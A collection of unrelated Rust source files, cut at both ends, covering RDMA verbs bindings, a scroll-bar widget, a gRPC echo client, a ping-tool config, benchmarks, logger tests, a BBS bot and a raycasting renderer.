fn pointer(self) -> *mut ibv_cq;
/// Grows the CQ to hold at least the requested number of events;
/// panics (via the macro) on failure.
#[inline(always)]
fn resize(&self, atLeastThisNumberOfCompletionQueueEvents: u31)
{
panic_on_error!(ibv_resize_cq, self.pointer(), atLeastThisNumberOfCompletionQueueEvents as i32);
}
/// NOTE: DO NOT CALL THIS ON AN EXTENDED CQ THAT IS CURRENTLY POLLING
#[inline(always)]
fn destroy(&mut self)
{
panic_on_errno!(ibv_destroy_cq, self.pointer());
}
/// Completion channel associated with this CQ, if any.
#[inline(always)]
fn completionChannel(self) -> *mut ibv_comp_channel
{
// SAFETY: pointer() implementations debug-assert non-null.
unsafe { (*self.pointer()).channel }
}
/// The `cqe` capacity recorded on the CQ.
#[inline(always)]
fn maximumNumberOfEntries(self) -> c_int
{
unsafe { (*self.pointer()).cqe }
}
#[inline(always)]
fn completionEventCompleted(self) -> u32
{
unsafe { (*self.pointer()).comp_events_completed }
}
#[inline(always)]
fn asynchronousEventCompleted(self) -> u32
{
unsafe { (*self.pointer()).async_events_completed }
}
/// ibv_poll_cq - Poll a CQ for work completions
/// @cq:the CQ being polled
/// @num_entries:maximum number of completions to return
/// @wc:array of at least @num_entries of &struct ibv_wc where completions
/// will be returned
///
/// Poll a CQ for (possibly multiple) completions. If the return value
/// is < 0, an error occurred. If the return value is >= 0, it is the
/// number of completions returned. If the return value is
/// non-negative and strictly less than num_entries, then the CQ was
/// emptied.
#[inline(always)]
fn ibv_poll_cq(self, num_entries: c_int, wc: *mut ibv_wc) -> c_int
{
// Dispatch through the provider's function table.
unsafe { self.verbs().ops().poll_cq.unwrap()(self.pointer(), num_entries, wc) }
}
/// ibv_req_notify_cq - Request completion notification on a CQ. An
/// event will be added to the completion channel associated with the
/// CQ when an entry is added to the CQ.
/// @cq: The completion queue to request notification for.
/// @solicited_only: If non-zero, an event will be generated only for
/// the next solicited CQ entry. If zero, any CQ entry, solicited or
/// not, will generate an event.
#[inline(always)]
fn ibv_req_notify_cq(self, solicited_only: bool) -> c_int
{
unsafe
{
self.verbs().ops().req_notify_cq.unwrap()(self.pointer(), if solicited_only
{
1
}
else
{
0
})
}
}
}
// Plain CQ pointers are their own `pointer()`.
impl CompletionQueuePointer for *mut ibv_cq
{
#[inline(always)]
fn pointer(self) -> *mut ibv_cq
{
debug_assert!(!self.is_null(), "self is null");
self
}
}
// Extended CQs are down-converted to the base struct first.
impl CompletionQueuePointer for *mut ibv_cq_ex
{
#[inline(always)]
fn pointer(self) -> *mut ibv_cq
{
debug_assert!(!self.is_null(), "self is null");
self.ibv_cq_ex_to_cq()
}
}
|
use crate::ui::*;
use rider_config::ConfigAccess;
use std::ops::{Deref, DerefMut};
/// Vertical orientation of the generic `ScrollBar`: the bar's height and
/// y-position track the content, while `set_location` moves it along x.
pub struct VerticalScrollBar {
inner: ScrollBar,
}
// Deref/DerefMut expose the inner ScrollBar's fields (rect, viewport,
// full, scroll_value) directly on the wrapper.
impl Deref for VerticalScrollBar {
type Target = ScrollBar;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for VerticalScrollBar {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
#[cfg_attr(tarpaulin, skip)]
impl VerticalScrollBar {
pub fn new(config: ConfigAccess) -> Self {
Self {
inner: ScrollBar::new(config),
}
}
}
impl ScrollWidget for VerticalScrollBar {
/// Vertical variant: the scroll position drives y and the bar length
/// is the rect's height. All field accesses below reach the inner
/// `ScrollBar` through Deref/DerefMut.
fn update_rect(&mut self, pos: i32, max: u32) {
self.mut_rect().set_height(max);
self.mut_rect().set_y(pos);
}
#[inline]
fn scroll_to(&mut self, n: i32) {
self.scroll_value = n;
}
#[inline]
fn scroll_value(&self) -> i32 {
self.scroll_value
}
#[inline]
fn set_viewport(&mut self, n: u32) {
self.viewport = n;
}
#[inline]
fn set_full_size(&mut self, n: u32) {
self.full = n;
}
#[inline]
fn set_location(&mut self, n: i32) {
// For a vertical bar, "location" is the x coordinate.
self.rect.set_x(n);
}
#[inline]
fn viewport(&self) -> u32 {
self.viewport
}
#[inline]
fn full(&self) -> u32 {
self.full
}
#[inline]
fn rect(&self) -> &sdl2::rect::Rect {
&self.rect
}
#[inline]
fn mut_rect(&mut self) -> &mut sdl2::rect::Rect {
&mut self.rect
}
}
#[cfg(test)]
mod test_update {
use super::*;
use crate::tests::*;
use std::sync::*;
// Test-only accessor so the tests can pre-seed the rect with sentinel
// values and detect whether update() touched it.
impl VerticalScrollBar {
pub fn rect_mut(&mut self) -> &mut sdl2::rect::Rect {
&mut self.rect
}
}
#[test]
fn assert_do_nothing_when_small_content() {
// Content (20) fits the viewport (100): the sentinel rect must survive.
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
widget.set_viewport(100);
widget.set_full_size(20);
widget.rect_mut().set_y(30000000);
widget.rect_mut().set_height(30000000);
widget.update(0, &UpdateContext::Nothing);
assert_eq!(widget.rect().y(), 30000000);
assert_eq!(widget.rect().height(), 30000000);
}
#[test]
fn assert_update_when_huge_content() {
// Content (200) overflows the viewport (100): rect must be recomputed.
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
widget.set_viewport(100);
widget.set_full_size(200);
widget.rect_mut().set_y(30000000);
widget.rect_mut().set_height(30000000);
widget.update(0, &UpdateContext::Nothing);
assert_eq!(widget.rect().y(), 0);
assert_eq!(widget.rect().height(), 50);
}
}
// Getter/setter round-trip tests for the ScrollWidget impl.
#[cfg(test)]
mod test_scrollable {
use super::*;
use crate::tests::*;
use std::sync::*;
#[test]
fn assert_scroll_to() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.scroll_value();
widget.scroll_to(157);
let current = widget.scroll_value();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_scroll_value() {
// A freshly built bar starts unscrolled.
let config = build_config();
let widget = VerticalScrollBar::new(Arc::clone(&config));
assert_eq!(widget.scroll_value(), 0);
}
#[test]
fn assert_set_viewport() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.viewport();
widget.set_viewport(157);
let current = widget.viewport();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_set_full_size() {
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.full;
widget.set_full_size(157);
let current = widget.full;
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
#[test]
fn assert_set_location() {
// set_location moves the bar along x for the vertical variant.
let config = build_config();
let mut widget = VerticalScrollBar::new(Arc::clone(&config));
let old = widget.rect().x();
widget.set_location(157);
let current = widget.rect().x();
let expected = 157;
assert_ne!(old, current);
assert_eq!(current, expected);
}
}
|
// Generated gRPC bindings for the `grpc.examples.echo` protobuf package,
// produced at build time by tonic-build.
pub mod pb {
tonic::include_proto!("grpc.examples.echo");
}
use pb::{echo_client::EchoClient, EchoRequest};
use tonic::transport::Channel;
#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let endpoints = ["http://[::1]:50051", "http://[::1]:50052"]
.iter()
.map(|a| Channel::from_static(a));
let channel = Channel::balance_list(endpoints);
let mut client = EchoClient::new(channel);
for _ in 0..12usize {
let request = tonic::Request::new(EchoRequest {
message: "hello".into(),
});
let response = client.unary_echo(request).await?;
println!("RESPONSE={:?}", response);
}
Ok(())
} |
use crate::{PingClientFactory, PingResultDto, PingResultProcessor, PortRangeList};
use std::fmt;
use std::fmt::Debug;
use std::net::{IpAddr, SocketAddr};
use std::str::FromStr;
use std::sync::{Arc, Mutex};
use std::{path::PathBuf, time::Duration};
// Tool identity strings used in CLI help/version output.
pub const RNP_NAME: &str = "rnp";
pub const RNP_AUTHOR: &str = "r12f (r12f.com, github.com/r12f)";
pub const RNP_ABOUT: &str = "A simple layer 4 ping tool for cloud.";
/// Ping protocol selector. `External` carries the name of a protocol
/// implemented by an external ping client factory.
#[derive(Debug, Clone, Ord, PartialOrd, Eq, PartialEq)]
pub enum RnpSupportedProtocol {
TCP,
QUIC,
External(String),
}
impl FromStr for RnpSupportedProtocol {
    type Err = String;
    /// Parses a protocol name case-insensitively. Only "TCP" and "QUIC"
    /// are accepted here; the `External` variant is constructed
    /// programmatically, never parsed.
    fn from_str(input: &str) -> Result<RnpSupportedProtocol, Self::Err> {
        let normalized = input.to_uppercase();
        if normalized == "TCP" {
            Ok(RnpSupportedProtocol::TCP)
        } else if normalized == "QUIC" {
            Ok(RnpSupportedProtocol::QUIC)
        } else {
            Err(String::from("Invalid protocol"))
        }
    }
}
impl fmt::Display for RnpSupportedProtocol {
    /// Formats the protocol as its canonical short name ("TCP", "QUIC",
    /// or the external protocol's own name).
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        // Annotate the match result as `&str` so the `External` arm's
        // `&String` deref-coerces cleanly, instead of relying on the
        // `&&String` double reference the previous `&p` produced.
        let protocol: &str = match self {
            RnpSupportedProtocol::TCP => "TCP",
            RnpSupportedProtocol::QUIC => "QUIC",
            RnpSupportedProtocol::External(p) => p,
        };
        write!(f, "{}", protocol)
    }
}
/// Top-level configuration bundle for one ping run: worker settings,
/// scheduling, result processing, plus optional externally supplied
/// ping-client factory and extra result processors.
pub struct RnpPingConfig {
pub worker_config: PingWorkerConfig,
pub worker_scheduler_config: PingWorkerSchedulerConfig,
pub result_processor_config: PingResultProcessorConfig,
// Not Debug/PartialEq; the impls below compare/print it by presence only.
pub external_ping_client_factory: Option<PingClientFactory>,
pub extra_ping_result_processors: Vec<Box<dyn PingResultProcessor + Send + Sync>>,
}
impl Debug for RnpPingConfig {
/// Manual Debug because the factory closure and the processor trait
/// objects are not Debug: the factory is shown by presence only, the
/// processors by their names.
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.debug_struct("RnpCoreConfig")
.field("worker_config", &self.worker_config)
.field("worker_scheduler_config", &self.worker_scheduler_config)
.field("result_processor_config", &self.result_processor_config)
.field(
"external_ping_client_factory",
&if self.external_ping_client_factory.is_some() { "Some(PingClientFactory)".to_string() } else { "None".to_string() },
)
.field("extra_ping_result_processors", &self.extra_ping_result_processors.iter().map(|p| p.name()).collect::<Vec<&'static str>>())
.finish()
}
}
impl PartialEq for RnpPingConfig {
    /// Field-wise equality; the factory is compared by presence only, and
    /// extra processors are compared by name.
    fn eq(&self, other: &RnpPingConfig) -> bool {
        let basics_match = self.worker_config == other.worker_config
            && self.worker_scheduler_config == other.worker_scheduler_config
            && self.result_processor_config == other.result_processor_config
            && self.external_ping_client_factory.is_some() == other.external_ping_client_factory.is_some();
        if !basics_match {
            return false;
        }
        // Same processor count and pairwise-identical names (equivalent to
        // counting zip matches against both lengths).
        self.extra_ping_result_processors.len() == other.extra_ping_result_processors.len()
            && self
                .extra_ping_result_processors
                .iter()
                .zip(other.extra_ping_result_processors.iter())
                .all(|(a, b)| a.name() == b.name())
    }
}
/// Settings shared by every ping worker in a run.
#[derive(Debug, Clone, PartialEq)]
pub struct PingWorkerConfig {
    pub protocol: RnpSupportedProtocol, // which ping client to use
    pub target: SocketAddr,             // endpoint being pinged
    pub source_ip: IpAddr,              // local address to bind
    pub ping_interval: Duration,        // delay between successive pings
    pub ping_client_config: PingClientConfig,
}
/// Knobs forwarded to the concrete ping client implementation.
#[derive(Debug, Clone, PartialEq)]
pub struct PingClientConfig {
    pub wait_timeout: Duration,        // per-ping timeout
    pub time_to_live: Option<u32>,     // IP TTL override, when set
    pub check_disconnect: bool,        // also observe the disconnect phase — TODO confirm semantics
    pub server_name: Option<String>,   // presumably TLS/QUIC server name (SNI) — confirm
    pub log_tls_key: bool,             // presumably dumps TLS keys for debugging — confirm
    pub alpn_protocol: Option<String>, // ALPN value offered in the handshake
    pub use_timer_rtt: bool,           // NOTE(review): RTT via timer instead of protocol data — confirm
}
/// Controls how many pings run, from which source ports, and the parallelism.
#[derive(Debug, Clone, PartialEq)]
pub struct PingWorkerSchedulerConfig {
    pub source_ports: PortRangeList, // local ports to rotate through
    pub ping_count: Option<u32>,     // total pings; None presumably means unbounded — confirm
    pub warmup_count: u32,           // warmup pings before measurement
    pub parallel_ping_count: u32,    // concurrent pings in flight
}
/// Settings shared by every result processor.
#[derive(Debug, Clone, PartialEq)]
pub struct PingResultProcessorCommonConfig {
    pub quiet_level: i32, // one of the RNP_QUIET_LEVEL_* constants
}
// Quiet levels; higher values suppress more output (exact scope of each
// level is enforced by the processors — confirm there).
pub const RNP_QUIET_LEVEL_NONE: i32 = 0;
pub const RNP_QUIET_LEVEL_NO_PING_RESULT: i32 = 1;
pub const RNP_QUIET_LEVEL_NO_PING_SUMMARY: i32 = 2;
pub const RNP_QUIET_LEVEL_NO_OUTPUT: i32 = 3;
/// Configuration of the result-processing pipeline (logging targets, scatter
/// displays, latency buckets, and exit-on-failure behavior).
#[derive(Debug, Clone)]
pub struct PingResultProcessorConfig {
    pub common_config: PingResultProcessorCommonConfig,
    pub exit_on_fail: bool, // stop the run on the first failure
    // Shared slot filled with the failing result when exiting early.
    pub exit_failure_reason: Option<Arc<Mutex<Option<PingResultDto>>>>,
    pub csv_log_path: Option<PathBuf>,  // write results as CSV when set
    pub json_log_path: Option<PathBuf>, // write results as JSON when set
    pub text_log_path: Option<PathBuf>, // write results as plain text when set
    pub show_result_scatter: bool,
    pub show_latency_scatter: bool,
    pub latency_buckets: Option<Vec<f64>>, // bucket boundaries for the latency histogram
}
impl PartialEq for PingResultProcessorConfig {
    /// Field-by-field comparison. `exit_failure_reason` is compared only for
    /// presence, since the shared slot itself has no meaningful equality.
    fn eq(&self, other: &PingResultProcessorConfig) -> bool {
        self.common_config == other.common_config
            && self.exit_on_fail == other.exit_on_fail
            && self.exit_failure_reason.is_some() == other.exit_failure_reason.is_some()
            && self.csv_log_path == other.csv_log_path
            && self.json_log_path == other.json_log_path
            && self.text_log_path == other.text_log_path
            && self.show_result_scatter == other.show_result_scatter
            && self.show_latency_scatter == other.show_latency_scatter
            && self.latency_buckets == other.latency_buckets
    }
}
/// Configuration for the built-in stub server that answers test pings.
#[derive(Debug, Clone, PartialEq)]
pub struct RnpStubServerConfig {
    pub protocol: RnpSupportedProtocol,
    pub server_address: SocketAddr,
    pub sleep_before_write: Duration, // artificial delay before responding
    pub write_chunk_size: usize,      // bytes written per chunk
    pub report_interval: Duration,    // presumably how often stats are reported — confirm
}
|
impl Solution {
pub fn decode(encoded: Vec<i32>, first: i32) -> Vec<i32> {
let n = encoded.len() + 1;
let mut res = vec![0;n];
res[0] = first;
for i in 1..n{
res[i] = res[i - 1] ^ encoded[i - 1];
}
res
}
} |
use error::*;
use serde_json;
use serialization::Module;
use std::fs::File;
use std::io::Read;
use std::path::Path;
pub fn file_from_path<TPath>(path: TPath) -> Result<File>
where TPath: AsRef<Path> {
let path = path.as_ref();
File::open(path)
.map_err(|err| Error::from(ErrorKind::IoError(err)))
.chain_err(|| ErrorKind::FileFromPathFailure(path.to_path_buf()))
}
pub fn module_from_path<TPath>(path: TPath) -> Result<Module>
where TPath: AsRef<Path> {
let file = try!(file_from_path(path));
let text = try!(text_from_file(file));
module_from_text(text)
}
/// Deserializes a `Module` from its JSON text; on failure the error chain
/// records the text that failed to parse.
pub fn module_from_text(text: String) -> Result<Module> {
    let parsed = serde_json::from_str::<Module>(&text);
    parsed
        .map_err(|err| Error::from(ErrorKind::SerdeJsonError(err)))
        .chain_err(|| ErrorKind::PluginDeserializationFailure(text))
}
pub fn text_from_file(mut file: File) -> Result<String> {
let mut result = String::new();
match file.read_to_string(&mut result) {
Err(err) => {
Err(Error::from(ErrorKind::IoError(err))).chain_err(|| ErrorKind::TextFromFileFailure(file))
},
Ok(_) => {
Ok(result)
},
}
}
|
use caolo_sim::tables::{btree_table::BTreeTable, page_table::PageTable, JoinIterator};
use caolo_sim::{indices::EntityId, tables::flag_table::SparseFlagTable};
use criterion::{black_box, criterion_group, Criterion};
use rand::{rngs::SmallRng, Rng, SeedableRng};
use serde::{Deserialize, Serialize};
fn get_rand() -> impl rand::Rng {
SmallRng::seed_from_u64(0xdeadbeef)
}
/// Zero-sized marker component used by the flag-table benchmark.
#[derive(Default, Debug, Clone, Serialize, Deserialize)]
struct Flag {}
/// Deliberately bulky (60-byte) component so joins move realistic payloads.
#[derive(Default, Debug, Clone, Serialize, Deserialize)]
struct LargeComponent {
    _a: [u8; 10],
    _b: [u8; 10],
    _c: [u8; 10],
    _d: [u8; 10],
    _e: [u8; 10],
    _f: [u8; 10],
}
/// Fills a `PageTable` with `len` entries whose ids are drawn uniformly from
/// `0..=domain`, retrying whenever a drawn id was already occupied.
fn random_vec_table(len: usize, domain: u32) -> PageTable<LargeComponent> {
    let mut rng = get_rand();
    let mut table = PageTable::new(domain as usize);
    for _ in 0..len {
        // `insert` returns Some(old) on collision; keep drawing until we
        // land on a previously empty slot (same retry behavior as before).
        loop {
            let id = EntityId::new(rng.gen_range(0..=domain), 0);
            if table.insert(id, LargeComponent::default()).is_none() {
                break;
            }
        }
    }
    table
}
/// Fills a `BTreeTable` with `len` entries whose ids are drawn uniformly from
/// `0..=domain`, retrying whenever a drawn id was already occupied.
fn random_bt_table(len: usize, domain: u32) -> BTreeTable<EntityId, LargeComponent> {
    let mut rng = get_rand();
    let mut table = BTreeTable::new();
    for _ in 0..len {
        loop {
            let id = EntityId::new(rng.gen_range(0..=domain), 0);
            if table.insert(id, LargeComponent::default()).is_none() {
                break;
            }
        }
    }
    table
}
/// Joins page-table (left) against btree (right); ~2^15 rows over a 2^16 id
/// space, i.e. a half-full ("sparse") domain.
fn join_vec_btree_2pow15_sparse(c: &mut Criterion) {
    c.bench_function("join_vec_btree_2pow15_sparse", |b| {
        let btree = random_bt_table(1 << 15, 1 << 16);
        let paged = random_vec_table(1 << 15, 1 << 16);
        b.iter(move || {
            JoinIterator::new(paged.iter(), btree.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins btree (left) against page-table (right); sparse domain.
fn join_btree_vec_2pow15_sparse(c: &mut Criterion) {
    c.bench_function("join_btree_vec_2pow15_sparse", |b| {
        let btree = random_bt_table(1 << 15, 1 << 16);
        let paged = random_vec_table(1 << 15, 1 << 16);
        b.iter(move || {
            JoinIterator::new(btree.iter(), paged.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins two page-tables; sparse domain.
fn join_vec_vec_2pow15_sparse(c: &mut Criterion) {
    c.bench_function("join_vec_vec_2pow15_sparse", |b| {
        let first = random_vec_table(1 << 15, 1 << 16);
        let second = random_vec_table(1 << 15, 1 << 16);
        b.iter(move || {
            JoinIterator::new(second.iter(), first.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins two btree tables; sparse domain.
fn join_bt_bt_2pow15_sparse(c: &mut Criterion) {
    c.bench_function("join_bt_bt_2pow15_sparse", |b| {
        let first = random_bt_table(1 << 15, 1 << 16);
        let second = random_bt_table(1 << 15, 1 << 16);
        b.iter(move || {
            JoinIterator::new(second.iter(), first.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins page-table (left) against btree (right); 2^15 rows over a 2^15 id
/// space, i.e. a nearly full ("dense") domain.
fn join_vec_btree_2pow15_dense(c: &mut Criterion) {
    c.bench_function("join_vec_btree_2pow15_dense", |b| {
        let btree = random_bt_table(1 << 15, 1 << 15);
        let paged = random_vec_table(1 << 15, 1 << 15);
        b.iter(move || {
            JoinIterator::new(paged.iter(), btree.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins btree (left) against page-table (right); dense domain.
fn join_btree_vec_2pow15_dense(c: &mut Criterion) {
    c.bench_function("join_btree_vec_2pow15_dense", |b| {
        let btree = random_bt_table(1 << 15, 1 << 15);
        let paged = random_vec_table(1 << 15, 1 << 15);
        b.iter(move || {
            JoinIterator::new(btree.iter(), paged.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins two page-tables; dense domain.
fn join_vec_vec_2pow15_dense(c: &mut Criterion) {
    c.bench_function("join_vec_vec_2pow15_dense", |b| {
        let first = random_vec_table(1 << 15, 1 << 15);
        let second = random_vec_table(1 << 15, 1 << 15);
        b.iter(move || {
            JoinIterator::new(second.iter(), first.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins two btree tables; dense domain.
fn join_bt_bt_2pow15_dense(c: &mut Criterion) {
    c.bench_function("join_bt_bt_2pow15_dense", |b| {
        let first = random_bt_table(1 << 15, 1 << 15);
        let second = random_bt_table(1 << 15, 1 << 15);
        b.iter(move || {
            JoinIterator::new(second.iter(), first.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
/// Joins a sparse flag table (one flag per page-table row) with the
/// page-table it mirrors. Note the registered name is "join_flag_vec".
fn join_flag_vec_sparse(c: &mut Criterion) {
    c.bench_function("join_flag_vec", |b| {
        let vectable = random_vec_table(1 << 12, 1 << 15);
        // Flag every id that exists in the page table.
        let mut flags = SparseFlagTable::<_, Flag>::default();
        vectable.iter().for_each(|(id, _)| flags.insert(id));
        b.iter(move || {
            JoinIterator::new(flags.iter(), vectable.iter()).for_each(|row| {
                black_box(row);
            })
        });
    });
}
criterion_group!(
    join_benches,
    // Fixed: join_bt_bt_2pow15_dense was previously registered twice.
    join_bt_bt_2pow15_dense,
    join_vec_vec_2pow15_dense,
    join_btree_vec_2pow15_dense,
    join_vec_btree_2pow15_dense,
    join_vec_vec_2pow15_sparse,
    join_btree_vec_2pow15_sparse,
    join_vec_btree_2pow15_sparse,
    join_bt_bt_2pow15_sparse,
    join_flag_vec_sparse
);
|
use datadog_logs::{
client::HttpDataDogClient,
config::DataDogConfig,
logger::{DataDogLogLevel, DataDogLogger},
};
#[test]
fn test_logger_stops_http() {
    let config = DataDogConfig::default();
    let client = HttpDataDogClient::new(&config).unwrap();
    let logger = DataDogLogger::blocking::<HttpDataDogClient>(client, config);

    logger.log("message", DataDogLogLevel::Alert);

    // Dropping the logger must shut its logging loop down; if the loop does
    // not break, this drop hangs forever and the test never finishes.
    drop(logger);
}
#[tokio::test]
async fn test_async_logger_stops_http() {
    let config = DataDogConfig::default();
    let client = HttpDataDogClient::new(&config).unwrap();
    let (logger, future) = DataDogLogger::non_blocking_cold::<HttpDataDogClient>(client, config);
    let _task = tokio::spawn(future);

    logger.log("message", DataDogLogLevel::Alert);

    // Dropping the logger must terminate the spawned logging loop; the test
    // hangs forever otherwise.
    drop(logger);
}
|
use hacspec_lib::*;
// `Block` is a hacspec fixed-size array of 8 `U32` elements.
// NOTE(review): `U32` is a hacspec_lib integer type; confirm its arithmetic
// semantics (secret/wrapping) against the hacspec_lib docs.
array!(Block, 8, U32);
/// Returns `b` with element 1 added into element 0; all other elements are
/// unchanged. The input is taken by value (hacspec style) and rebound
/// mutably so the copy can be edited in place.
pub fn shuffle(b: Block) -> Block {
    let mut b = b;
    let b1: U32 = b[1];
    b[0] += b1;
    b
}
|
/// Short form to compose Error values.
///
/// Here are few possible ways:
///
/// ```ignore
/// use crate::Error;
/// err_at!(Error::Invalid(String::default(), "bad argument"));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, msg: format!("bad argument"));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, std::io::read(buf));
/// ```
///
/// ```ignore
/// use crate::Error;
/// err_at!(Invalid, std::fs::read(file_path), format!("read failed"));
/// ```
///
#[macro_export]
macro_rules! err_at {
    // Re-stamp an existing Result's error with this call site's file:line,
    // preserving the variant and its message.
    ($e:expr) => {{
        use Error::*;
        let p = format!("{}:{}", file!(), line!());
        match $e {
            Ok(val) => Ok(val),
            Err(Fatal(_, s)) => Err(Fatal(p, s)),
            Err(Invalid(_, s)) => Err(Invalid(p, s)),
            Err(IOError(_, s)) => Err(IOError(p, s)),
            Err(Parse(_, s)) => Err(Parse(p, s)),
        }
    }};
    // Build an Err of the named variant from a message, tagged with file:line.
    ($v:ident, msg:$m:expr) => {{
        let prefix = format!("{}:{}", file!(), line!());
        Err(Error::$v(prefix, format!("{}", $m)))
    }};
    // Convert any Err of `$e` into the named variant, tagged with file:line.
    ($v:ident, $e:expr) => {
        match $e {
            Ok(val) => Ok(val),
            Err(err) => {
                let prefix = format!("{}:{}", file!(), line!());
                Err(Error::$v(prefix, format!("{}", err)))
            }
        }
    };
    // Same as above, with an extra caller-supplied message prepended.
    ($v:ident, $e:expr, $m:expr) => {
        match $e {
            Ok(val) => Ok(val),
            Err(err) => {
                let prefix = format!("{}:{}", file!(), line!());
                Err(Error::$v(prefix, format!("{} {}", $m, err)))
            }
        }
    };
}
|
extern crate hyper;
extern crate rustc_serialize;
extern crate bbs;
use std::io::Read;
use std::net::TcpListener;
use hyper::Client;
use hyper::header::UserAgent;
use hyper::server::{Server, Request, Response};
use bbs::{BOT_ADDR, HTML_ADDR};
use bbs::UserClient;
use bbs::Message;
use rustc_serialize::json;
/// Handles an incoming POST of the form "choose n1 n2 ...": picks one of the
/// numbers (via random.org) and forwards the choice to the BBS server.
/// Non-POST requests and payloads not starting with "choose" are ignored.
fn req_handler(mut req: Request, mut res: Response) {
    if req.method != hyper::Post {
        return;
    }
    let mut body = String::new();
    req.read_to_string(&mut body).unwrap();
    let tokens: Vec<&str> = body.split(" ").collect();
    if tokens[0] != "choose" {
        return;
    }
    // Every token except the "choose" keyword is a candidate number.
    let numbers: Vec<i32> = tokens
        .iter()
        .filter(|token| **token != "choose")
        .map(|token| token.parse::<i32>().unwrap())
        .collect();
    send_to_server(choose(numbers));
}
fn choose(numbers: Vec<i32>) -> String {
let rand_client: Client = hyper::Client::new();
let url = "https://www.random.org/integers/?num=1&min=1&max=".to_string() + &numbers.len().to_string()
+ "&col=1&base=10&format=plain&rnd=new";
let mut response = rand_client.get(&url).send().unwrap();
let mut buf = String::new();
response.read_to_string(&mut buf).unwrap();
// println!("string={}", buf);
let new_line = buf.len() - 1;
buf.truncate(new_line);
let idx = buf.parse::<i32>().unwrap() - 1;
return numbers[idx as usize].to_string();
}
/// Posts the chosen number to the BBS HTML endpoint as the "bot" user.
fn send_to_server(number: String) {
    println!("send number {} to server", number);
    let bbs = UserClient::new("bot".to_string(), HTML_ADDR.to_string());
    bbs.send_msg(number);
}
/// Starts the bot's HTTP server on BOT_ADDR and dispatches every request to
/// `req_handler`. Failures are logged rather than propagated.
fn main() {
    // Create a bot user.
    // TODO
    // Start TcpListener.
    // TODO
    println!("Listening on {}.", BOT_ADDR);
    match Server::http(BOT_ADDR) {
        Ok(server) => match server.handle(req_handler) {
            Ok(_) => (),
            // Fixed typo in the log message: "hanle" -> "handle".
            Err(e) => println!("server.handle error: {:?}", e),
        },
        Err(e) => println!("Server::http error: {:?}", e),
    }
    // Listen for incoming TCP connections.
    // For each connection, accept it and read all data from the stream.
    // If it's a 'choose' message, post to the BBS with a response (via the above bot user).
    // TODO
}
#[cfg(test)]
mod test {
    // NOTE: these are smoke tests that hit the network / a running BBS
    // server, not isolated unit tests.

    #[test]
    fn test_choose() {
        let a = vec![123, 21, 3133, 23, 32, 42123];
        println!("{}", super::choose(a));
    }

    /// Verifies a trailing newline can be trimmed off before parsing.
    #[test]
    fn test_convert() {
        let mut my_string = "2\n".to_string();
        // Removed an unused `int_vec` local and the commented-out loop that
        // went with it; truncation is the approach actually used.
        let new_len = my_string.len() - 1;
        my_string.truncate(new_len);
        let my_int = my_string.parse::<i32>().unwrap();
        println!("{}", my_int);
    }

    #[test]
    fn test_send_to_server() {
        super::send_to_server("10".to_string());
    }
}
#![feature(test)]
#[cfg(test)]
extern crate test;
#[macro_use]
extern crate derive_new;
pub mod board;
|
use rand::{SeedableRng, Rng};
use crate::game_plugin::{Position, Rotation};
use crate::texture::{Drawable, Texture};
use crate::util;
use crate::TILE_SIZE;
/// Renders one frame: casts a ray per screen column, draws the wall slice it
/// hits, then fills floor (below the slice) and ceiling (above it).
/// `projection_plane` is the output (width, height) in pixels; `fov` is in
/// degrees. Errors from the drawing helpers are propagated as strings.
pub fn raycast(
    projection_plane: (i32, i32),
    fov: i32,
    position: &Position,
    rotation: &Rotation,
    pixels: &mut [u8],
    wall_texture: &Texture,
    floor_texture: &Texture,
    map: &Map,
) -> Result<(), String> {
    let half_fov = Rotation::new(fov as f32 / 2.0);
    let fov = Rotation::new(fov as f32);
    // RNG drives the lighting dither inside Map::distance_to_light.
    let mut rng = rand::rngs::SmallRng::from_entropy();
    // using the formula tan(angle) = opposite / adjacent
    // We know the angle, because that's FOV/2
    // We know opposite, because that's projection's plane width / 2
    let distance_to_plane = (projection_plane.0 / 2) as f32 / half_fov.tan();
    // The angle increment between rays is known by the fov. ie, how many steps would you need to fit the plane.
    let degrees_per_iteration = fov.degrees() / projection_plane.0 as f32;
    // The starting angle is the viewing angle rotated minus half the fov.
    // \ | /
    // \ | /
    // º\|/
    // º p--------
    // ºººº
    let mut ray_rotation = rotation.rotated(-half_fov.degrees());
    let tile_size = TILE_SIZE as f32;
    for x in 0..projection_plane.0 {
        // Axis-aligned rays never cross grid lines of their own axis; skip
        // that search (MAX distance) so it can never win the comparison below.
        let horizontal_distance = if ray_rotation.is_straight_horizontal() {
            (IntersectionPoint::default(), f32::MAX)
        } else {
            look_for_horizontal(&ray_rotation, position, &map)?
        };
        let vertical_distance = if ray_rotation.is_straight_vertical() {
            (IntersectionPoint::default(), f32::MAX)
        } else {
            look_for_vertical(&ray_rotation, position, &map)?
        };
        // Drawing some debug lines for the rays
        /*
        canvas.set_draw_color((20, 50, 20));
        let ray_dir = ray_rotation.direction() * 5.0;
        let some_distance_away = (position.x + ray_dir.x, position.y + ray_dir.y);
        canvas.draw_line(
            (position.x.floor() as i32, position.y.floor() as i32),
            (
